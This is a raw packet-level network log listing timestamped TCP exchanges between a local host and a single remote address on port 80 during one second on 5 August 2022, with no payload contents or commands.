Aug 5, 2022 16:36:15.543385029 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543421984 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543447018 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543461084 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543482065 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543498993 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543520927 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543538094 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543540955 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543577909 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543596029 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543613911 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543636084 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543652058 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543663025 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543689966 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543713093 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543725967 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543737888 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543765068 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543782949 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543803930 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543818951 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543842077 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543853998 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543880939 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543904066 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543917894 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543925047 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543957949 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.543975115 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.543996096 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.544017076 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.544030905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.544034004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.544069052 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.544090033 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.544106960 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.544125080 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.544145107 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.544163942 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.544183016 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.544183969 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.544219971 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.544240952 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.544259071 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646066904 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646130085 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646215916 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646219969 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646250963 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646260023 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646277905 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646322966 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646339893 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646384001 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646385908 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646424055 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646440983 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646482944 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646508932 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646548986 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646564007 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646645069 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646665096 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646682978 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646709919 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646720886 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646729946 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646759033 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646774054 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646796942 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646815062 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646835089 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646856070 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646871090 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646878004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646908998 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646929026 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646949053 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.646979094 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.646986008 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647025108 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647027016 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647047043 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647063017 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647092104 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647109985 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647110939 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647151947 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647167921 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647217989 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647248983 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647257090 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647295952 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647301912 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647330999 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.647332907 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647344112 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.647373915 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.649751902 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.649797916 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.649833918 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.649856091 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.649871111 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.649872065 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.649878979 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.649910927 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.649924994 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.649957895 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.661710024 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661751032 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661784887 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661814928 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661847115 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661854982 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.661878109 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661891937 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.661897898 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.661902905 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.661909103 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661921024 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.661942959 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661971092 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.661974907 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.661988974 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662007093 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662025928 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662039995 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662055969 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662070036 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662075043 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662102938 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662121058 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662134886 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662139893 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662166119 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662190914 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662197113 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662213087 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662229061 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662239075 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662261009 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662281990 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662293911 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662308931 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662324905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662343979 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662355900 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662367105 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662386894 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662410021 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662417889 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662429094 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662450075 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662456036 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662482023 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662503004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662513018 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662523985 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662545919 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662566900 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662576914 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662587881 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662609100 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662626982 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662641048 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662651062 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662672043 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662693977 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662703991 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662718058 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662735939 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662750959 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662767887 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662786961 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662800074 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662807941 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662830114 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662853003 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662862062 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662873030 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662893057 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662900925 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662924051 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662942886 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662955999 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.662986040 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.662987947 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663002014 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663018942 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663028002 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663067102 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663094997 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663100958 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663124084 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663136005 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663161993 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663170099 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663199902 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663203955 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663227081 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663239002 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663263083 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663271904 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663306952 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663307905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663336992 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663343906 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663378000 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663417101 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663423061 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663456917 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663486004 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663491011 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663518906 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663525105 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663552046 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663559914 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663587093 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663595915 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663619041 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663629055 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663660049 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663664103 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663693905 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663697958 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663726091 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663731098 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663754940 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663765907 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663786888 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663800001 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663824081 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663836002 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663870096 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663872004 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663897038 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663904905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663930893 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663938999 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.663968086 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.663975000 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664000988 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664007902 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664041042 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664045095 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664076090 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664079905 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664103031 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664113998 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664135933 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664150000 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664177895 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664182901 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664211988 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664218903 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664249897 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664252996 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664279938 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664285898 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664311886 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664320946 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664354086 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664355993 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664390087 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664391041 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664424896 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664427042 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664449930 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664459944 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664495945 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664496899 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664527893 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664530993 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664558887 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664565086 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664592028 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664599895 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664627075 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664633989 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664660931 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664668083 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664704084 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664705038 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664736032 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664736986 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664769888 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664771080 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664804935 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664805889 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664836884 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664841890 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664872885 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664875984 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664906979 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664911985 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664941072 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.664942980 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664978027 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.664978027 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.665011883 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.665019989 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.665050030 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.665080070 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765233040 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765346050 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765387058 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765506029 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765521049 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765543938 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765549898 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765561104 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765575886 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765597105 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765598059 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765636921 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765662909 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765683889 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765734911 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765774965 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765790939 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765827894 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765845060 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765881062 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765897989 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765916109 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765918970 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765961885 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.765975952 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.765997887 CEST	80	49175	198.23.207.54	192.168.2.22
Aug 5, 2022 16:36:15.766016960 CEST	49175	80	192.168.2.22	198.23.207.54
Aug 5, 2022 16:36:15.766033888 CEST	49175	80	192.168.2.22	198.23.207.54
